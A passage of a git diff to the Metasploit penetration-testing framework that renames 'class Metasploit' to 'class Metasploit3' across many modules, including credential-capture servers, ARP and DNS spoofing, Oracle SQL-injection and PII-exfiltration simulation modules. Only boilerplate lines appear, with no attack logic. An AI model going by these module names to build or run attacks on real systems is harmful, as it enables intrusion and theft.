Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/pop3.rb b/modules/auxiliary/server/capture/pop3.rb index f1aa95700b..f22877434f 100644 --- a/modules/auxiliary/server/capture/pop3.rb +++ b/modules/auxiliary/server/capture/pop3.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/postgresql.rb b/modules/auxiliary/server/capture/postgresql.rb index e5c93e695a..d9f11042d1 100644 --- a/modules/auxiliary/server/capture/postgresql.rb +++ b/modules/auxiliary/server/capture/postgresql.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/printjob_capture.rb b/modules/auxiliary/server/capture/printjob_capture.rb index 96787619bc..8c08bf33d4 100644 --- a/modules/auxiliary/server/capture/printjob_capture.rb +++ b/modules/auxiliary/server/capture/printjob_capture.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/server/capture/sip.rb b/modules/auxiliary/server/capture/sip.rb index a0fed4e5a8..03dd3e2113 100644 --- a/modules/auxiliary/server/capture/sip.rb +++ b/modules/auxiliary/server/capture/sip.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/socket' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/smb.rb b/modules/auxiliary/server/capture/smb.rb index 8b1bcd12c4..1f3e23306a 100644 --- a/modules/auxiliary/server/capture/smb.rb +++ b/modules/auxiliary/server/capture/smb.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::SMB::Server diff --git a/modules/auxiliary/server/capture/smtp.rb b/modules/auxiliary/server/capture/smtp.rb index 280713da5c..12769c29cb 100644 --- a/modules/auxiliary/server/capture/smtp.rb +++ b/modules/auxiliary/server/capture/smtp.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/telnet.rb b/modules/auxiliary/server/capture/telnet.rb index f772760df0..d1cabac7e4 100644 --- a/modules/auxiliary/server/capture/telnet.rb +++ b/modules/auxiliary/server/capture/telnet.rb @@ -6,7 +6,7 @@ require 'msf/core' # Fake Telnet Service - Kris Katterjohn 09/28/2008 -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/vnc.rb b/modules/auxiliary/server/capture/vnc.rb index 6a15f8e334..adf634969d 100644 --- a/modules/auxiliary/server/capture/vnc.rb +++ b/modules/auxiliary/server/capture/vnc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/dhclient_bash_env.rb b/modules/auxiliary/server/dhclient_bash_env.rb index 2a1f072a11..1441bd48c9 100644 --- a/modules/auxiliary/server/dhclient_bash_env.rb +++ b/modules/auxiliary/server/dhclient_bash_env.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/dhcp' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DHCPServer diff --git a/modules/auxiliary/server/dhcp.rb b/modules/auxiliary/server/dhcp.rb index c074e28bb8..65aad4275c 100644 --- a/modules/auxiliary/server/dhcp.rb +++ b/modules/auxiliary/server/dhcp.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/dhcp' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DHCPServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/dns/spoofhelper.rb b/modules/auxiliary/server/dns/spoofhelper.rb index 2fcd3ec793..1fda7a81a6 100644 --- a/modules/auxiliary/server/dns/spoofhelper.rb +++ b/modules/auxiliary/server/dns/spoofhelper.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'resolv' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/fakedns.rb b/modules/auxiliary/server/fakedns.rb index f1b0c0f9b1..88c9c5f125 100644 --- a/modules/auxiliary/server/fakedns.rb +++ b/modules/auxiliary/server/fakedns.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'resolv' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/ftp.rb b/modules/auxiliary/server/ftp.rb index 953ec114c2..c6bb913e8a 100644 --- a/modules/auxiliary/server/ftp.rb +++ b/modules/auxiliary/server/ftp.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::FtpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index 3b727a10e8..285232a1fa 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb @@ -15,7 +15,7 @@ NTLM_CONST = Rex::Proto::NTLM::Constants NTLM_CRYPT = Rex::Proto::NTLM::Crypt MESSAGE = Rex::Proto::NTLM::Message -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index 91f45357cf..18ef1934ae 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb index c111beb305..7d8e18556b 100644 --- a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb +++ b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/ms15_134_mcl_leak.rb b/modules/auxiliary/server/ms15_134_mcl_leak.rb index 80abfbea76..1b97e2d2ea 100644 --- a/modules/auxiliary/server/ms15_134_mcl_leak.rb +++ b/modules/auxiliary/server/ms15_134_mcl_leak.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'cgi' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb index 02391e4388..b30cb8c6b8 100644 --- a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb +++ b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb index 3db664b270..f316d4100d 100644 --- a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb +++ b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/pxeexploit.rb b/modules/auxiliary/server/pxeexploit.rb index 0f7c80c351..a2a7815f82 100644 --- a/modules/auxiliary/server/pxeexploit.rb +++ b/modules/auxiliary/server/pxeexploit.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/tftp' require 'rex/proto/dhcp' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TFTPServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/socks4a.rb b/modules/auxiliary/server/socks4a.rb index addfdf31bc..1695eeb3e2 100644 --- a/modules/auxiliary/server/socks4a.rb +++ b/modules/auxiliary/server/socks4a.rb @@ -7,7 +7,7 @@ require 'thread' require 'msf/core' require 'rex/proto/proxy/socks4a' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/socks_unc.rb b/modules/auxiliary/server/socks_unc.rb index 2d649cd149..547253c0b9 100644 --- a/modules/auxiliary/server/socks_unc.rb +++ b/modules/auxiliary/server/socks_unc.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/tftp.rb b/modules/auxiliary/server/tftp.rb index 9db4ec579d..92466df2ee 100644 --- a/modules/auxiliary/server/tftp.rb +++ b/modules/auxiliary/server/tftp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/tftp' require 'tmpdir' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TFTPServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/webkit_xslt_dropper.rb b/modules/auxiliary/server/webkit_xslt_dropper.rb index cb2e57891b..c46d0dc197 100644 --- a/modules/auxiliary/server/webkit_xslt_dropper.rb +++ b/modules/auxiliary/server/webkit_xslt_dropper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/wget_symlink_file_write.rb b/modules/auxiliary/server/wget_symlink_file_write.rb index b89d7efe72..7c1393b655 100644 --- a/modules/auxiliary/server/wget_symlink_file_write.rb +++ b/modules/auxiliary/server/wget_symlink_file_write.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::FtpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/wpad.rb b/modules/auxiliary/server/wpad.rb index 5d7056af68..087e30c9d5 100644 --- a/modules/auxiliary/server/wpad.rb +++ b/modules/auxiliary/server/wpad.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/sniffer/psnuffle.rb b/modules/auxiliary/sniffer/psnuffle.rb index b24760d8c8..d2551d6e13 100644 --- a/modules/auxiliary/sniffer/psnuffle.rb +++ b/modules/auxiliary/sniffer/psnuffle.rb @@ -15,7 +15,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/arp/arp_poisoning.rb b/modules/auxiliary/spoof/arp/arp_poisoning.rb index 3673e97560..e60bac50ee 100644 --- a/modules/auxiliary/spoof/arp/arp_poisoning.rb +++ b/modules/auxiliary/spoof/arp/arp_poisoning.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Auxiliary::Report diff --git a/modules/auxiliary/spoof/cisco/cdp.rb b/modules/auxiliary/spoof/cisco/cdp.rb index 45d5cb42f3..b320ad39ab 100644 --- a/modules/auxiliary/spoof/cisco/cdp.rb +++ b/modules/auxiliary/spoof/cisco/cdp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture def initialize diff --git a/modules/auxiliary/spoof/cisco/dtp.rb b/modules/auxiliary/spoof/cisco/dtp.rb index 1ce5abe531..99635b7b88 100644 --- a/modules/auxiliary/spoof/cisco/dtp.rb +++ b/modules/auxiliary/spoof/cisco/dtp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Capture diff --git a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb index d4f009487c..252269ec00 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/dns' require 'resolv' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/dns/bailiwicked_host.rb b/modules/auxiliary/spoof/dns/bailiwicked_host.rb index eb68b74212..e6b76e176e 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb @@ -9,7 +9,7 @@ require 'net/dns' require 'resolv' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/dns/compare_results.rb b/modules/auxiliary/spoof/dns/compare_results.rb index 36cf5b8d9d..6b881e849e 100644 --- a/modules/auxiliary/spoof/dns/compare_results.rb +++ b/modules/auxiliary/spoof/dns/compare_results.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/dns' require 'resolv' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, diff --git a/modules/auxiliary/spoof/llmnr/llmnr_response.rb b/modules/auxiliary/spoof/llmnr/llmnr_response.rb index b7008b7cfe..b94cb212c8 100644 --- a/modules/auxiliary/spoof/llmnr/llmnr_response.rb +++ b/modules/auxiliary/spoof/llmnr/llmnr_response.rb @@ -8,7 +8,7 @@ require 'socket' require 'ipaddr' require 'net/dns' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/nbns/nbns_response.rb b/modules/auxiliary/spoof/nbns/nbns_response.rb index 159f704389..56be4ad3f2 100644 --- a/modules/auxiliary/spoof/nbns/nbns_response.rb +++ b/modules/auxiliary/spoof/nbns/nbns_response.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/replay/pcap_replay.rb b/modules/auxiliary/spoof/replay/pcap_replay.rb index fd0e10f87b..c2a8526b1b 100644 --- a/modules/auxiliary/spoof/replay/pcap_replay.rb +++ b/modules/auxiliary/spoof/replay/pcap_replay.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Capture diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb index 4b1ae5661c..321e6274cf 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb index 3932e77b88..94a89cafaa 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb index 66cc92e5bb..ec27e9811d 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb index 3dd0cd7e06..7b91469936 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb index a02a211749..c0022ed351 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb index ca6c859ea2..f4fb58a5de 100644 --- a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb +++ b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb index 2fc47d231e..d7d10f96fc 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb index aa17fbd596..d37f8afa39 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb index f6ca08b9e7..e6a178033c 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/droptable_trigger.rb b/modules/auxiliary/sqli/oracle/droptable_trigger.rb index f9ec295f43..e26375ae12 100644 --- a/modules/auxiliary/sqli/oracle/droptable_trigger.rb +++ b/modules/auxiliary/sqli/oracle/droptable_trigger.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::FILEFORMAT diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb index d7a2712839..e3df57ecb9 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb index 66bfd93a4f..4ecfd3accb 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb index 5ce774e5e0..878c2b01d6 100644 --- a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb index 03b7cea145..0ae6f375c2 100644 --- a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb +++ b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb index b2b4e0d8a4..93d6a71e4b 100644 --- a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb index 1eb86f2ede..fac34e6d92 100644 --- a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb index 31bcd81a14..d97591d2da 100644 --- a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/voip/asterisk_login.rb b/modules/auxiliary/voip/asterisk_login.rb index eb48e9260b..a05995214d 100644 --- a/modules/auxiliary/voip/asterisk_login.rb +++ b/modules/auxiliary/voip/asterisk_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/voip/cisco_cucdm_call_forward.rb b/modules/auxiliary/voip/cisco_cucdm_call_forward.rb index 018915866f..54bf04b7c3 100644 --- a/modules/auxiliary/voip/cisco_cucdm_call_forward.rb +++ b/modules/auxiliary/voip/cisco_cucdm_call_forward.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb index 6d3cfdb80d..cccf08529f 100644 --- a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb +++ b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/voip/sip_deregister.rb b/modules/auxiliary/voip/sip_deregister.rb index 9c791b89ac..1369b7b231 100644 --- a/modules/auxiliary/voip/sip_deregister.rb +++ b/modules/auxiliary/voip/sip_deregister.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/voip/sip_invite_spoof.rb b/modules/auxiliary/voip/sip_invite_spoof.rb index bab2c0246b..5ee141c27c 100644 --- a/modules/auxiliary/voip/sip_invite_spoof.rb +++ b/modules/auxiliary/voip/sip_invite_spoof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/voip/telisca_ips_lock_control.rb b/modules/auxiliary/voip/telisca_ips_lock_control.rb index f63ed27a00..3f40c00489 100644 --- a/modules/auxiliary/voip/telisca_ips_lock_control.rb +++ b/modules/auxiliary/voip/telisca_ips_lock_control.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb b/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb index ad1a35e20c..6421fdb954 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary def initialize super( diff --git a/modules/auxiliary/vsploit/malware/dns/dns_query.rb b/modules/auxiliary/vsploit/malware/dns/dns_query.rb index f9e14094ec..0a91a507cb 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_query.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_query.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary def initialize super( diff --git a/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb b/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb index 7a7105138a..097746a5d4 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary def initialize super( diff --git a/modules/auxiliary/vsploit/pii/email_pii.rb b/modules/auxiliary/vsploit/pii/email_pii.rb index 5175781d52..d68bbbdea6 100644 --- a/modules/auxiliary/vsploit/pii/email_pii.rb +++ b/modules/auxiliary/vsploit/pii/email_pii.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # # This module sends pii via an attacker smtp machine diff --git a/modules/auxiliary/vsploit/pii/web_pii.rb b/modules/auxiliary/vsploit/pii/web_pii.rb index 7306d30742..2046f60300 100644 --- a/modules/auxiliary/vsploit/pii/web_pii.rb +++ b/modules/auxiliary/vsploit/pii/web_pii.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # # This module acts as an compromised webserver distributing PII Data diff --git a/modules/encoders/cmd/echo.rb b/modules/encoders/cmd/echo.rb index bef7893628..95911f0ded 100644 --- a/modules/encoders/cmd/echo.rb +++ b/modules/encoders/cmd/echo.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Encoder +class Metasploit3 < Msf::Encoder Rank = GoodRanking diff --git a/modules/encoders/cmd/generic_sh.rb b/modules/encoders/cmd/generic_sh.rb index f51056a05e..16e62302ef 100644 --- a/modules/encoders/cmd/generic_sh.rb +++ b/modules/encoders/cmd/generic_sh.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Encoder +class Metasploit3 < Msf::Encoder # Has some issues, but overall it's pretty good Rank = ManualRanking diff --git a/modules/encoders/cmd/ifs.rb b/modules/encoders/cmd/ifs.rb index 8ae828035f..602b3508d2 100644 